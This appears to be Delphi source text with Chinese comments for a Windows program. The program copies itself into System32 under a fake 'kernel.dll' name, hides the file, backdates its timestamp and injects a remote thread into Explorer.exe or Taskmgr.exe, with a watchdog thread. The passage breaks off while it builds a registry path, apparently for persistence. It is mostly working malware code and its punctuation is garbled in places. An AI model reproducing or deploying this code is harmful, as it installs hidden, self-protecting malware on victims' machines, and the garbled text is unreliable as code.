1、unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs,PSAPI, StdCtrls,Registry; type PRemoteParameter = TRemoteParameter; TRemoteParameter = record pOutputDebugString : DWORD; pOpenprocess : DWORD; pWaitForSingleObject: DWORD; pFindFirstFile :

2、DWORD; pCopyFile : DWORD; pFindClose : DWORD; pWinExeC : DWORD; pRemotePid : DWORD; pProcessHandle : THANDLE; pFileHandle : THANDLE; pTName : array0.MAX_PATH of char; pKName : array0.MAX_PATH of char; pWinexecName : array0.MAX_PATH of char; pFData : WIN32_FIND_DATA; pOpError : array0.59 of char; pFf

3、fError : array0.59 of char; pCfError : array0.59 of char; pFcError : array0.59 of char; pWeError : array0.59 of char; pString : array0.59 of char; pWfsoSignal : array0.59 of char; end; TForm1 = class(TForm Button1: TButton; Button2: TButton; procedure Button1Click(Sender: TObject; procedure Button2C

4、lick(Sender: TObject; procedure FormCreate(Sender: TObject; private Private declarations public Public declarations end; const Name1 = 'Test.exe' const Name2 = 'kernel.dll' var Form1: TForm1; wThread : THandle; procedure Doaction; function CreateRemote(tName: PChar; kName: PChar: THa

5、ndle; function remote(pvParam:pointer:integer;stdcall; function watch(pvParam: Pointer: integer;stdcall; type EOutputDebugString = procedure(p : PChar; stdcall; EOpenProcess = function(p1: DWORD; p2: Boolean; p3: DWORD:THandle; stdcall; EWaitForSingleObject = function(p1: THandle; p2: DWORD:DWORD;st

6、dcall; EFindFirstFile = function(p1:PChar;p2: PWin32FindData:THandle;stdcall; ECopyFile = function(p1:PChar; p2: PChar; p3: Boolean:Boolean;stdcall; EFindClose = function(p:Thandle:Boolean;stdcall; EWinExec = function(p1:PChar;p2:Cardinal:Cardinal;stdcall; implementation $R *.dfm function StringToWi

7、deStringEx(const S: string; CodePage: Word: WideString; var InputLength, OutputLength: Integer; begin InputLength := Length(S; OutputLength := MultiByteToWideChar(CodePage, 0, PChar(S, InputLength, nil, 0; SetLength(Result, OutputLength; MultiByteToWideChar(CodePage, 0, PChar(S, InputLength, PWideCh

8、ar(Result, OutputLength; end; function WideStringToStringEx(const WS: WideString; CodePage: Word: string; var InputLength, OutputLength: Integer; begin InputLength := Length(WS; OutputLength := WideCharToMultiByte(CodePage, 0, PWideChar(WS, InputLength, nil, 0, nil, nil; SetLength(Result, OutputLeng

9、th; WideCharToMultiByte(CodePage, 0, PWideChar(WS, InputLength, PChar(Result , OutputLength, nil, nil; end; Function StringToUnicode(S:String:WideString; begin Result:=StringToWideStringEx(S,GetACP; end; Function UnicodeToString(S:WideString:string; begin Result:=WideStringToStringEx(S,GetACP; end;

10、procedure DoAction; var fData : WIN32_FIND_DATA; ffHandle : THandle; fcHandle : THandle; sTime : SYSTEMTIME; fTime : FILETIME; sysPath : array0.MAX_PATH-1 of char; curName : array0.MAX_PATH-1 of char; tName : array0.MAX_PATH-1 of char; kName : array0.MAX_PATH-1 of char; ret : integer; rThread : THan

11、dle; aHwnd : HWND; rt : TRect; ptNew : TPoint; title : array0.MAX_PATH-1 of char; wp : WINDOWPLACEMENT; aThreadId: Cardinal; begin / 獲取System32目錄的路徑 / tName = System32/T-Mouse.exe; kName = System32/Kernel.dll ret := GetSystemDirectory(syspath,MAX_PATH; if ret = 0 then begin OutputDebugString('Ge

12、tSystemDirectory Error'+#13#10; exit; end; strlcopy(tName,sysPath,strlen(sysPath; strCat(tName,Name1; strlCopy(kName,SysPath,strlen(SysPath; strCat(kName,Name2; ffHandle := FindFirstFile(tName,fData; / 查找Test.exe if(ffHandle=INVALID_HANDLE_VALUE then begin if GetLastError = ERROR_FILE_NOT_FOUND

13、then / 如果不存在，則復制當前文件為System32/Test.exe begin ret := GetModuleFileName(0,curName,MAX_PATH; if ret = 0 then begin OutputDebugString('GetModuleFileName Error'+#13#10; exit; end; if not CopyFIle(curName,tName,true then begin OutputDebugString('CopyFile Error'+#13#10; exit; end; end else

14、begin OutputDebugString('FindFirstFile Error'+#13#10; exit; end; end else begin if not Windows.FindClose(ffHandle then begin OutputDebugString('FindClose Error!'+#13#10; exit; end; end; ffHandle := FindFirstFile(kName,fData; / 查找Kernel.dll if ffHandle = INVALID_HANDLE_VALUE then begi

15、n if GetLastError = ERROR_FILE_NOT_FOUND then / 如果不存在，則復制當前文件為System32/Kernel.dll begin ret := GetModuleFileName(0,curName,MAX_PATH; if ret = 0 then begin OutputDebugString('GetModuleFileName Error'+#13#10; exit; end; if not CopyFile(curName,kName,true then begin OutputDebugString('CopyF

16、ile Error'+#13#10; exit; end; / 修改System32/Kernel.dll的屬性為隱藏和系統及它的時間 fcHandle := CreateFile(kName,GENERIC_WRITE,FILE_SHARE_WRITE,nil,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0; if fcHandle = INVALID_HANDLE_VALUE then begin OutputDebugString('CreateFile Error'+#13#10; exit; end; fillchar(sTime,

17、sizeof(sTime,0; stime.wYear := 2002; stime.wMonth := 1; stime.wDay := 12; stime.wDayOfWeek := 5; stime.wHour := 1; if not SystemTImeToFileTime(sTime,fTime then begin OutputDebugString('SystemTimeToFileTIme Error'+#13#10; CloseHandle(fcHandle; exit; end; if not SetFileTime(fcHandle,fTime,nil,

18、fTime then begin OutputDebugString('SetFileTime Error'+#13#10; exit; end; if not SetFileAttributes(kName,FILE_ATTRIBUTE_READONLY or FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_SYSTEM then begin OutputDebugString('SetFileAttributes Error'+#13#10; CloseHandle(fcHandle; exit; end; CloseHand

19、le(fcHandle; end else begin OutputDebugString('FindFirstFile Error'+#13#10; exit; end; end else if not Windows.FindClose(ffHandle then begin OutputDebugString('FindClose Error'+#13#10; exit; end; rThread := CreateRemote(tName,kName; / 遠程注入線程到Exporer.exe 或 mgrtask.exe if rthread = 0 t

20、hen begin OutputDebugString('CreateRemote Error'+#13#10; exit; end; / 創建一監視線程，監視遠程注入的線程有沒有在運行。 wThread := CreateThread(nil,0,watch,rThread,0,aThreadId; if wThread = 0 then begin OutputDebugString('CreateThread Error'+#13#10; CloseHandle(rThread; exit; end; end; function ProcessToPid(

21、ProcessName: string:integer; var pidProcesses : array0.1023 of DWORD; cb,cbNeeded : DWORD; cProcesses : DWORD; hProcess : THANDLE; hModule : THANDLE; i : integer; normalName : array0.1023 of char; begin cb := sizeof(pidProcesses; fillchar(normalName,sizeof(normalName,0; result := -1; if not EnumProc

22、esses(pidProcesses0,cb,cbNeeded then begin exit; end; cProcesses := cbNeeded div sizeof(DWORD; for i := 0 to cProcesses - 1 do begin hProcess := OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_READ,FALSE,pidProcessesi; if hProcess <> 0 then begin if(EnumProcessModules(hProcess,hModule,size

23、of(hModule,cbNeeded then begin GetModuleBaseName(hProcess,hModule,normalName,sizeof(normalName; if compareText(ProcessName,string(normalName = 0 then begin result := pidProcessesi; closeHandle(hProcess; exit; end; end; end; end; end; function CreateRemote(tName: PChar; kName: PChar: THandle; var eTh

24、read : THandle; pHandle : THandle; aName : array0.1,0.14 of char; remoteThr : PChar; remotePar : PChar; remotePid : DWORD; cb : integer; signal : integer; hKernel32 : THandle; rp : TRemoteParameter; cbByte : DWORD; threadid : DWORD; temp : widestring; begin strcopy(aName0,'Explorer.exe' strc

25、opy(aName1,'Taskmgr.exe' signal := 1; while(true do begin signal := signal + 1; remoteP id := ProcessToPid(aName(signal mod 2; /循環獲取兩個文件的PID if remotePid = -1 then begin result := 0; exit; end else begin if remotePid = 0 then begin if (signal mod 2=0 then begin OutputDebugString('Remote

26、process Explorer isn''t running!'+#13#10; end else begin OutputDebugString('Remote process Taskmgr isn''t running!'+#13#10; end; sleep(1000; continue; end; pHandle := OpenProcess(PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or PROCESS_VM_WRITE,False,remotePid; if pHandle

27、=0 then begin sleep(1000; continue; end else begin break; end; end; end; cb := sizeof(char * 4 * 1024; / 申請4K內存 remotethr := virtualAllocEx(pHandle,nil,cb,MEM_COMMIT,PAGE_EXECUTE_READWRITE; if remotethr = nil then begin OutputDebugString('VirtualAllocEx for Thread error!'+#13#10; closehandle

28、(pHandle; exit; end; / 遠程注入列程 if not WriteProcessMemory(pHandle,remotethr,remote,cb,cbByte then begin OutputDebugString('WritePRocessMemory for thread error!'+#13#10; closehandle(pHandle; exit; end; fillchar(rp,0,sizeof(rp; rp.pRemotePid := GetCurrentProcessId; temp := StringToUnicode('i

29、 am in remote process'+#13#10; copymemory(rp.pString0, temp1,length('i am in remote process'+#13#10*2; temp := StringToUnicode('CopyFile error'+#13#10; copymemory(rp.pCfError0, temp1,length('CopyFile error'+#13#100*2; temp := StringToUnicode('FindClose error'+#13#

30、10; copymemory(rp.pFcError0, temp1,length('FindClose error'+#13#10*2; temp := StringToUnicode('FindFirstFile error'+#13#10; copymemory(rp.pFffError0, temp1,length('FindFirstFile error'+#13#10*2; temp := StringToUnicode('OpenProcess error'+#13#10; copymemory(rp.pOpErro

31、r0, temp1,length('OpenProcess error'+#13#10*2; temp := StringToUnicode('WinExec error'+#13#10; copymemory(rp.pWeError0, temp1,length('WinExec error'+#13#10*2; temp := StringToUnicode('i am out of remote process'+#13#10; copymemory(rp.pWfsoSignal0, temp1,length('i

32、am out of remote process'+#13#10*2; temp := StringToUnicode(string(tName; copymemory(rp.pTName0,temp1,length(tName*2; temp := StringToUnicode(string(kName; copymemory(rp.pKName0,temp1,length(kName*2; temp := StringToUnicode(string(tName; WideCharToMultiByte(GetACP,0,temp1,-1,rp.pWinexecName,strl

33、en(tName,nil,nil; hKernel32 := GetModuleHandle(PChar('Kernel32.dll' rp.pOutputDebugString := DWORD(GetProcAddress(hKernel32,'OutputDebugStringW' rp.pOpenprocess := DWORD(GetProcAddress(hKernel32,'OpenProcess' rp.pWaitForSingleObject := DWORD(GetProcAddress(hKernel32,'Wait

34、ForSingleObject' rp.pFindFirstFile := DWORD(GetProcAddress(hKernel32,'FindFirstFileW' rp.pCopyFile := DW ORD(GetProcAddress(hKernel32,'CopyFileW' rp.pFindClose := DWORD(GetProcAddress(hKernel32,'FindClose' rp.pWinExeC := DWORD(GetProcAddress(hKernel32,'WinExec' cb

35、 := sizeof(char * sizeof(rp; remotepar := virtualAllocEx(pHandle,nil,cb,MEM_COMMIT, PAGE_READWRITE; if remotepar = nil then begin OutputDebugString(PChar(StringToUnicode('VirtualAllocEx for parameter error'+#13#10; closehandle(pHandle; result := 0; exit; end; / 遠程注入一個結構，把一些要調用的數據傳遞過去 if not

36、WriteProcessMemory(pHandle,remotepar,rp,cb,cbByte then begin OutputDebugString(PChar(StringToUnicode('WriteProcessMemory for paramter error'+#13#10; closehandle(pHandle; result:= 0; exit; end; /啟動遠程線程 eThread := CreateRemoteThread(pHandle,nil,0,remotethr,remotepar,0,threadid; if eThread = 0

37、then begin OutputDebugString(PChar(StringToUnicode('CreateRemoteThread error'+#13#10; closehandle(pHandle; result:= 0; exit; end; result := eThread; end; function watch(pvParam: Pointer: integer;stdcall; var weThread : THandle; exitcode : DWORD; sName : array0.MAX_PATH-1 of char; wtName : array0.MAX_PATH-1 of char; wkName : array0.MAX_PATH-1 of char; lpData : array0.MAX_PATH-1 of char; rgsPath : string; aType : DWORD; dwBufLen : DWORD; ret : integer; reg : TRegistry; aKey : HKEY; begin weThread := DWORD(pvParam; rgsPath := 'softwaremicrosof